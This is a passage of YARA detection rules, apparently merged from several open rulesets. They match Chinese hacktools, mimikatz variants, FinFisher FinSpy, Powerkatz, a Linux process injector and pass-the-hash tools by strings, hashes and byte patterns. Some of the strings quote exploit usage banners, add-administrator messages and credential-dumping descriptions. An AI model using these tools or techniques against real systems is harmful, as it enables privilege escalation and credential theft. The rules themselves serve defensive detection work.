fullword ascii $s3 = "@ddns.oray.com/ph/update?hostname=" fullword ascii $s4 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide $s5 = "ListViewProcessListColumnClick!" fullword ascii $s6 = "http://iframe.ip138.com/ic.asp" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 3000KB and 3 of them } rule ms11080_withcmd { meta: description = "Chinese Hacktool Set - file ms11080_withcmd.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "745e5058acff27b09cfd6169caf6e45097881a49" strings: $s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii $s2 = "\\ms11080\\ms11080\\Debug\\ms11080.pdb" fullword ascii $s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii $s4 = "[>] create porcess error" fullword ascii $s5 = "[>] ms11-080 Exploit" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 300KB and 1 of them } rule OtherTools_xiaoa { meta: description = "Chinese Hacktool Set - file xiaoa.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "6988acb738e78d582e3614f83993628cf92ae26d" strings: $s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii $s2 = "The shell \"cmd\" success!" fullword ascii $s3 = "Not Windows NT family OS." fullword ascii /* PEStudio Blacklist: os */ $s4 = "Unable to get kernel base address." fullword ascii $s5 = "run \"%s\" failed,code: %d" fullword ascii $s6 = "Windows Kernel Local Privilege Exploit " fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and 2 of them } rule unknown2 { meta: description = "Chinese Hacktool Set - file unknown2.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "32508d75c3d95e045ddc82cb829281a288bd5aa3" strings: $s1 = "http://md5.com.cn/index.php/md5reverse/index/md/" fullword wide $s2 = "http://www.md5decrypter.co.uk/feed/api.aspx?" fullword wide $s3 = "http://www.md5.com.cn" fullword wide $s4 = "1.5.exe" fullword wide $s5 = "\\Set.ini" fullword wide $s6 = "OpenFileDialog1" fullword wide $s7 = " (*.txt)|*.txt" fullword wide condition: uint16(0) == 0x5a4d and filesize < 300KB and 4 of them } rule hydra_7_3_hydra { meta: description = "Chinese Hacktool Set - file hydra.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "2f82b8bf1159e43427880d70bcd116dc9e8026ad" strings: $s1 = "[ATTEMPT-ERROR] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu" fullword ascii $s2 = "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICE" ascii $s3 = "cn=^USER^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.com" fullword ascii $s4 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii $s5 = "hydra -P pass.txt target cisco-enable (direct console access)" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 700KB and 1 of them } rule OracleScan { meta: description = "Chinese Hacktool Set - file OracleScan.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "10ff7faf72fe6da8f05526367b3522a2408999ec" strings: $s1 = "MYBLOG:HTTP://HI.BAIDU.COM/0X24Q" fullword ascii $s2 = "\\Borland\\Delphi\\RTL" fullword ascii $s3 = "USER_NAME" ascii $s4 = "FROMWWHERE" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 300KB and all of them } rule SQLTools { meta: description = "Chinese Hacktool Set - file SQLTools.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "38a9caa2079afa2c8d7327e7762f7ed9a69056f7" strings: $s1 = "DBN_POST" fullword wide $s2 = "LOADER ERROR" fullword ascii $s3 = "www.1285.net" fullword wide $s4 = "TUPFILEFORM" fullword wide $s5 = "DBN_DELETE" fullword wide $s6 = "DBINSERT" fullword wide $s7 = "Copyright (C) Kibosoft Corp. 2001-2006" fullword wide condition: uint16(0) == 0x5a4d and filesize < 2350KB and all of them } rule portscanner { meta: description = "Chinese Hacktool Set - file portscanner.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "1de367d503fdaaeee30e8ad7c100dd1e320858a4" strings: $s0 = "PortListfNo" fullword ascii $s1 = ".533.net" fullword ascii $s2 = "CRTDLL.DLL" fullword ascii $s3 = "exitfc" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 25KB and all of them } rule kappfree { meta: description = "Chinese Hacktool Set - file kappfree.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "e57e79f190f8a24ca911e6c7e008743480c08553" strings: $s1 = "Bienvenue dans un processus distant" fullword wide $s2 = "kappfree.dll" fullword ascii $s3 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide condition: uint16(0) == 0x5a4d and filesize < 200KB and all of them } rule Smartniff { meta: description = "Chinese Hacktool Set - file Smartniff.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "67609f21d54a57955d8fe6d48bc471f328748d0a" strings: $s1 = "smsniff.exe" fullword wide $s2 = "support@nirsoft.net0" fullword ascii $s3 = "</requestedPrivileges></security></trustInfo></assembly>" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 200KB and all of them } rule ChinaChopper_caidao { meta: description = "Chinese Hacktool Set - file caidao.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "056a60ec1f6a8959bfc43254d97527b003ae5edb" strings: $s1 = "Pass,Config,n{)" fullword ascii $s2 = "phMYSQLZ" fullword ascii $s3 = "\\DHLP\\." fullword ascii $s4 = "\\dhlp\\." fullword ascii $s5 = "SHAutoComple" fullword ascii $s6 = "MainFrame" ascii condition: uint16(0) == 0x5a4d and filesize < 1077KB and all of them } rule KiwiTaskmgr_2 { meta: description = "Chinese Hacktool Set - file KiwiTaskmgr.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16" strings: $s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide $s2 = "Kiwi Taskmgr no-gpo" fullword wide $s3 = "KiwiAndTaskMgr" fullword wide condition: uint16(0) == 0x5a4d and filesize < 300KB and all of them } rule kappfree_2 { meta: description = "Chinese Hacktool Set - file kappfree.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "5d578df9a71670aa832d1cd63379e6162564fb6b" strings: $s1 = "kappfree.dll" fullword ascii $s2 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide $s3 = "' introuvable !" fullword wide $s4 = "kiwi\\mimikatz" fullword wide condition: uint16(0) == 0x5a4d and filesize < 200KB and 2 of them } rule x_way2_5_sqlcmd { meta: description = "Chinese Hacktool Set - file sqlcmd.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "5152a57e3638418b0d97a42db1c0fc2f893a2794" strings: $s1 = "LOADER ERROR" fullword ascii $s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii $s3 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii $s4 = "kernel32.dll" fullword ascii $s5 = "VirtualAlloc" fullword ascii $s6 = "VirtualFree" fullword ascii $s7 = "VirtualProtect" fullword ascii $s8 = "ExitProcess" fullword ascii $s9 = "user32.dll" fullword ascii $s16 = "MessageBoxA" fullword ascii $s10 = "wsprintfA" fullword ascii $s11 = "kernel32.dll" fullword ascii $s12 = "GetProcAddress" fullword ascii $s13 = "GetModuleHandleA" fullword ascii $s14 = "LoadLibraryA" fullword ascii $s15 = "odbc32.dll" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 23KB and filesize > 20KB and all of them } rule Win32_klock { meta: description = "Chinese Hacktool Set - file klock.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "7addce4434670927c4efaa560524680ba2871d17" strings: $s1 = "klock.dll" fullword ascii $s2 = "Erreur : impossible de basculer le bureau ; SwitchDesktop : " fullword wide $s3 = "klock de mimikatz pour Windows" fullword wide condition: uint16(0) == 0x5a4d and filesize < 250KB and all of them } rule ipsearcher { meta: description = "Chinese Hacktool Set - file ipsearcher.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "1e96e9c5c56fcbea94d26ce0b3f1548b224a4791" strings: $s0 = "http://www.wzpg.com" fullword ascii $s1 = "ipsearcher\\ipsearcher\\Release\\ipsearcher.pdb" fullword ascii $s3 = "_GetAddress" fullword ascii $s5 = "ipsearcher.dll" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 140KB and all of them } rule ms10048_x64 { meta: description = "Chinese Hacktool Set - file ms10048-x64.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0" strings: $s1 = "The target is most likely patched." fullword ascii $s2 = "Dojibiron by Ronald Huizer, (c) master#h4cker.us " fullword ascii $s3 = "[ ] Creating evil window" fullword ascii $s4 = "[+] Set to %d exploit half succeeded" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 40KB and 1 of them } rule hscangui { meta: description = "Chinese Hacktool Set - file hscangui.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "af8aced0a78e1181f4c307c78402481a589f8d07" strings: $s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\" !!!" fullword ascii $s2 = "http://www.cnhonker.com" fullword ascii $s3 = "%s@ftpscan#Cracked account: %s/%s" fullword ascii $s4 = "[%s]: Found \"FTP account: %s/%s\" !!!" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 220KB and 2 of them } rule GoodToolset_ms11080 { meta: description = "Chinese Hacktool Set - file ms11080.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f" strings: $s1 = "[*] command add user 90sec 90sec" fullword ascii $s2 = "\\ms11080\\Debug\\ms11080.pdb" fullword ascii $s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii $s4 = "[*] Add to Administrators success" fullword ascii $s5 = "[*] User has been successfully added" fullword ascii $s6 = "[>] ms11-08 Exploit" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 240KB and 2 of them } rule epathobj_exp64 { meta: description = "Chinese Hacktool Set - file epathobj_exp64.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "09195ba4e25ccce35c188657957c0f2c6a61d083" strings: $s1 = "Watchdog thread %d waiting on Mutex" fullword ascii $s2 = "Exploit ok run command" fullword ascii $s3 = "\\epathobj_exp\\x64\\Release\\epathobj_exp.pdb" fullword ascii $s4 = "Alllocated userspace PATHRECORD () %p" fullword ascii $s5 = "Mutex object did not timeout, list not patched" fullword ascii $s6 = "- inconsistent onexit begin-end variables" fullword wide /* Goodware String - occured 96 times */ condition: uint16(0) == 0x5a4d and filesize < 150KB and 2 of them } rule kelloworld_2 { meta: description = "Chinese Hacktool Set - file kelloworld.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "55d5dabd96c44d16e41f70f0357cba1dda26c24f" strings: $s1 = "Hello World!" fullword wide $s2 = "kelloworld.dll" fullword ascii $s3 = "kelloworld de mimikatz pour Windows" fullword wide condition: uint16(0) == 0x5a4d and filesize < 200KB and all of them } rule HScan_v1_20_hscan { meta: description = "Chinese Hacktool Set - file hscan.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "568b06696ea0270ee1a744a5ac16418c8dacde1c" strings: $s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\" !!!" fullword ascii $s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,100" fullword ascii $s3 = ".\\report\\%s-%s.html" fullword ascii $s4 = ".\\log\\Hscan.log" fullword ascii $s5 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 200KB and 2 of them } rule _Project1_Generate_rejoice { meta: description = "Chinese Hacktool Set - from files Project1.exe, Generate.exe, rejoice.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" super_rule = 1 hash0 = "d1a5e3b646a16a7fcccf03759bd0f96480111c96" hash1 = "2cb4c3916271868c30c7b4598da697f59e9c7a12" hash2 = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372" strings: $s1 = "sfUserAppDataRoaming" fullword ascii $s2 = "$TRzFrameControllerPropertyConnection" fullword ascii $s3 = "delphi32.exe" fullword ascii $s4 = "hkeyCurrentUser" fullword ascii $s5 = "%s is not a valid IP address." fullword wide $s6 = "Citadel hooking error" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 2000KB and all of them } rule _hscan_hscan_hscangui { meta: description = "Chinese Hacktool Set - from files hscan.exe, hscan.exe, hscangui.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" super_rule = 1 hash0 = "17a743e40790985ececf5c66eaad2a1f8c4cffe8" hash1 = "568b06696ea0270ee1a744a5ac16418c8dacde1c" hash2 = "af8aced0a78e1181f4c307c78402481a589f8d07" strings: $s1 = ".\\log\\Hscan.log" fullword ascii $s2 = ".\\report\\%s-%s.html" fullword ascii $s3 = "[%s]: checking \"FTP account: ftp/ftp@ftp.net\" ..." fullword ascii $s4 = "[%s]: IPC NULL session connection success !!!" fullword ascii $s5 = "Scan %d targets,use %4.1f minutes" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 240KB and all of them } rule kiwi_tools { meta: description = "Chinese Hacktool Set - from files kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, mimikatz.sys, sekurlsa.dll, kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, mimikatz.sys, sekurlsa.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" super_rule = 1 hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553" hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f" hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8" hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6" hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec" hash5 = "7addce4434670927c4efaa560524680ba2871d17" hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7" hash7 = "b5c93489a1b62181594d0fb08cc510d947353bc8" hash8 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5" hash9 = "5d578df9a71670aa832d1cd63379e6162564fb6b" hash10 = "febadc01a64a071816eac61a85418711debaf233" hash11 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86" hash12 = "56a61c808b311e2225849d195bbeb69733efe49a" hash13 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16" hash14 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc" hash15 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6" hash16 = "20facf1fa2d87cccf177403ca1a7852128a9a0ab" hash17 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5" strings: $s1 = "http://blog.gentilkiwi.com/mimikatz" ascii $s2 = "Benjamin Delpy" fullword ascii $s3 = "GlobalSign" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1000KB and all of them } rule kiwi_tools_gentil_kiwi { meta: description = "Chinese Hacktool Set - from files kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, sekurlsa.dll, kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, sekurlsa.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" super_rule = 1 hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553" hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f" hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8" hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6" hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec" hash5 = "7addce4434670927c4efaa560524680ba2871d17" hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7" hash7 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5" hash8 = "5d578df9a71670aa832d1cd63379e6162564fb6b" hash9 = "febadc01a64a071816eac61a85418711debaf233" hash10 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86" hash11 = "56a61c808b311e2225849d195bbeb69733efe49a" hash12 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16" hash13 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc" hash14 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6" hash15 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5" strings: $s1 = "mimikatz" fullword wide $s2 = "Copyright (C) 2012 Gentil Kiwi" fullword wide $s3 = "Gentil Kiwi" fullword wide condition: uint16(0) == 0x5a4d and filesize < 1000KB and all of them } rule dubrute : bruteforcer toolkit { meta: author = "Christian Rebischke (@sh1bumi)" date = "2015-09-05" description = "Rules for DuBrute Bruteforcer" in_the_wild = true family = "Hackingtool/Bruteforcer" strings: $a = "WBrute" $b = "error.txt" $c = "good.txt" $d = "source.txt" $e = "bad.txt" $f = "Generator IP@Login;Password" condition: //check for MZ Signature at offset 0 uint16(0) == 0x5A4D and //check for dubrute specific strings $a and $b and $c and $d and $e and $f } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule FinSpy_2 { meta: description = "FinFisher FinSpy" author = "botherder https://github.com/botherder" strings: $password1 = /\/scomma kbd101\.sys/ wide ascii $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ wide ascii $password3 = /\/scomma excel2010\.part/ wide ascii $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ wide ascii $password5 = /\/stab MSVCR32\.manifest/ wide ascii $password6 = /\/scomma MSN2010\.dll/ wide ascii $password7 = /\/scomma Firefox\.base/ wide ascii $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ wide ascii $password9 = /\/scomma IE7setup\.sys/ wide ascii $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ wide ascii $password11 = /\/scomma office2007\.cab/ wide ascii $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ wide ascii $password13 = /\/scomma outlook2007\.dll/ wide ascii $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ wide ascii $screenrec1 = /(s)111o00000000\.dat/ wide ascii $screenrec2 = /(t)111o00000000\.dat/ wide ascii $screenrec3 = /(f)113o00000000\.dat/ wide ascii $screenrec4 = /(w)114o00000000\.dat/ wide ascii $screenrec5 = /(u)112Q00000000\.dat/ wide ascii $screenrec6 = /(v)112Q00000000\.dat/ wide ascii $screenrec7 = /(v)112O00000000\.dat/ wide ascii //$keylogger1 = /\<%s UTC %s\|%d\|%s\>/ wide ascii //$keylogger2 = /1201[0-9A-F]{8}\.dat/ wide ascii $micrec = /2101[0-9A-F]{8}\.dat/ wide ascii $skyperec1 = /\[%19s\] %25s\: %s/ wide ascii $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide $skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ wide ascii $mouserec1 = /(m)sc183Q000\.dat/ wide ascii $mouserec2 = /2201[0-9A-F]{8}\.dat/ wide ascii $driver = /\\\\\\\\\.\\\\driverw/ wide ascii $janedow1 = /(J)ane Dow\'s x32 machine/ wide ascii $janedow2 = /(J)ane Dow\'s x64 machine/ wide ascii $versions1 = /(f)inspyv2/ nocase $versions2 = /(f)inspyv4/ nocase $bootkit1 = /(b)ootkit_x32driver/ $bootkit2 = /(b)ootkit_x64driver/ $typo1 = /(S)creenShort Recording/ wide $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide condition: 8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or any of ($mouserec*) or $driver or any of ($janedow*) or any of ($versions*) or any of ($bootkit*) or $typo1 or $mssounddx } rule FinSpy { meta: description = "FinFisher FinSpy" author = "AlienVault Labs" strings: $filter1 = "$password14" $filter2 = "$screenrec7" $filter3 = "$micrec" $filter4 = "$skyperec3" $filter5 = "$mouserec2" $filter6 = "$driver" $filter7 = "$janedow2" $filter8 = "$bootkit2" $password1 = /\/scomma kbd101\.sys/ wide ascii $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ wide ascii $password3 = /\/scomma excel2010\.part/ wide ascii $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ wide ascii $password5 = /\/stab MSVCR32\.manifest/ wide ascii $password6 = /\/scomma MSN2010\.dll/ wide ascii $password7 = /\/scomma Firefox\.base/ wide ascii $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ wide ascii $password9 = /\/scomma IE7setup\.sys/ wide ascii $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ wide ascii $password11 = /\/scomma office2007\.cab/ wide ascii $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ wide ascii $password13 = /\/scomma outlook2007\.dll/ wide ascii $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ wide ascii $screenrec1 = /(s)111o00000000\.dat/ wide ascii $screenrec2 = /(t)111o00000000\.dat/ wide ascii $screenrec3 = /(f)113o00000000\.dat/ wide ascii $screenrec4 = /(w)114o00000000\.dat/ wide ascii $screenrec5 = /(u)112Q00000000\.dat/ wide ascii $screenrec6 = /(v)112Q00000000\.dat/ wide ascii $screenrec7 = /(v)112O00000000\.dat/ wide ascii //$keylogger1 = /\<%s UTC %s\|%d\|%s\>/ wide ascii //$keylogger2 = /1201[0-9A-F]{8}\.dat/ wide ascii $micrec = /2101[0-9A-F]{8}\.dat/ wide ascii $skyperec1 = /\[%19s\] %25s\: %s/ wide ascii $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide //$skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ wide ascii //$mouserec1 = /(m)sc183Q000\.dat/ wide ascii //$mouserec2 = /2201[0-9A-F]{8}\.dat/ wide ascii $driver = /\\\\\\\\\.\\\\driverw/ wide ascii $janedow1 = /(J)ane Dow\'s x32 machine/ wide ascii $janedow2 = /(J)ane Dow\'s x64 machine/ wide ascii //$versions1 = /(f)inspyv2/ nocase //$versions2 = /(f)inspyv4/ nocase $bootkit1 = /(b)ootkit_x32driver/ $bootkit2 = /(b)ootkit_x64driver/ $typo1 = /(S)creenShort Recording/ wide $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide condition: (8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or $driver or any of ($janedow*) or any of ($bootkit*) or $typo1 or $mssounddx) and not any of ($filter*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2016-02-05 Identifier: Powerkatz */ rule Powerkatz_DLL_Generic { meta: description = "Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)" author = "Florian Roth" reference = "PowerKatz Analysis" date = "2016-02-05" super_rule = 1 score = 80 hash1 = "c20f30326fcebad25446cf2e267c341ac34664efad5c50ff07f0738ae2390eae" hash2 = "1e67476281c1ec1cf40e17d7fc28a3ab3250b474ef41cb10a72130990f0be6a0" hash3 = "49e7bac7e0db87bf3f0185e9cf51f2539dbc11384fefced465230c4e5bce0872" strings: $s1 = "%3u - Directory '%s' (*.kirbi)" fullword wide $s2 = "%*s pPublicKey : " fullword wide $s3 = "ad_hoc_network_formed" fullword wide $s4 = "<3 eo.oe ~ ANSSI E>" fullword wide $s5 = "\\*.kirbi" fullword wide $c1 = "kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x%08x)" fullword wide $c2 = "kuhl_m_lsadump_getComputerAndSyskey ; kuhl_m_lsadump_getSyskey KO" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them ) or 2 of them } /* Yara rule to detect ELF Linux process injector toolkit "mandibule" generic. name: TOOLKIT_Mandibule.yar analyzed by unixfreaxjp. result: TOOLKIT_Mandibule ./mandibule//mandibule-dynx86-stripped TOOLKIT_Mandibule ./mandibule//mandibule-dynx86-UNstripped TOOLKIT_Mandibule ./mandibule//mandibule-dun64-UNstripped TOOLKIT_Mandibule ./mandibule//mandibule-dyn64-stripped This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ private rule is__str_mandibule_gen1 { meta: author = "unixfreaxjp" date = "2018-05-31" strings: $str01 = "shared arguments too big" fullword nocase wide ascii $str02 = "self inject pid: %" fullword nocase wide ascii $str03 = "injected shellcode at 0x%lx" fullword nocase wide ascii $str04 = "target pid: %d" fullword nocase wide ascii $str05 = "mapping '%s' into memory at 0x%lx" fullword nocase wide ascii $str06 = "shellcode injection addr: 0x%lx" fullword nocase wide ascii $str07 = "loading elf at: 0x%llx" fullword nocase wide ascii condition: 4 of them } private rule is__hex_top_mandibule64 { meta: author = "unixfreaxjp" date = "2018-05-31" strings: $hex01 = { 48 8D 05 43 01 00 00 48 89 E7 FF D0 } // st $hex02 = { 53 48 83 EC 50 48 89 7C 24 08 48 8B 44 24 08 } // mn $hex03 = { 48 81 EC 18 02 00 00 89 7C 24 1C 48 89 74 } // pt $hex04 = { 53 48 81 EC 70 01 01 00 48 89 7C 24 08 48 8D 44 24 20 48 05 00 00 } // ld condition: 3 of them } private rule is__hex_mid_mandibule32 { meta: author = "unixfreaxjp" date = "2018-06-01" strings: $hex05 = { E8 09 07 00 00 81 C1 FC 1F 00 00 8D 81 26 E1 FF FF } // st $hex06 = { 56 53 83 EC 24 E8 E1 05 00 00 81 C3 D0 1E 00 00 8B 44 24 30} // mn $hex07 = { 81 C3 E8 29 00 00 C7 44 24 0C } // pt $hex08 = { E8 C6 D5 FF FF 83 C4 0C 68 00 01 00 00 } // ld condition: 3 of them } rule TOOLKIT_Mandibule { meta: description = "Generic detection for ELF Linux process injector mandibule generic" reference = "https://imgur.com/a/MuHSZtC" author = "unixfreaxjp" org = "MalwareMustDie" date = "2018-06-01" condition: ((is__str_mandibule_gen1) or (is__hex_mid_mandibule32)) or ((is__str_mandibule_gen1) or (is__hex_top_mandibule64)) and is__elf and filesize < 30KB } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule whosthere_alt : Toolkit { meta: description = "Auto-generated rule - file whosthere-alt.exe" author = "Florian Roth" reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit" date = "2015-07-10" score = 80 hash = "9b4c3691872ca5adf6d312b04190c6e14dd9cbe10e94c0dd3ee874f82db897de" strings: $s0 = "WHOSTHERE-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii /* PEStudio Blacklist: strings */ /* score: '49.00' */ $s1 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.00' */ $s2 = "dump output to a file, -o filename" fullword ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */ $s3 = "This tool lists the active LSA logon sessions with NTLM credentials." fullword ascii /* PEStudio Blacklist: strings */ /* score: '29.00' */ $s4 = "Error: pth.dll is not in the current directory!." fullword ascii /* score: '24.00' */ $s5 = "the output format is: username:domain:lmhash:nthash" fullword ascii /* PEStudio Blacklist: strings */ /* score: '17.00' */ $s6 = ".\\pth.dll" fullword ascii /* score: '16.00' */ $s7 = "Cannot get LSASS.EXE PID!" fullword ascii /* score: '14.00' */ condition: uint16(0) == 0x5a4d and filesize < 280KB and 2 of them } rule iam_alt_iam_alt : Toolkit { meta: description = "Auto-generated rule - file iam-alt.exe" author = "Florian Roth" reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit" date = "2015-07-10" score = 80 hash = "2ea662ef58142d9e340553ce50d95c1b7a405672acdfd476403a565bdd0cfb90" strings: $s0 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii /* PEStudio Blacklist: strings */ /* score: '59.00' */ $s1 = 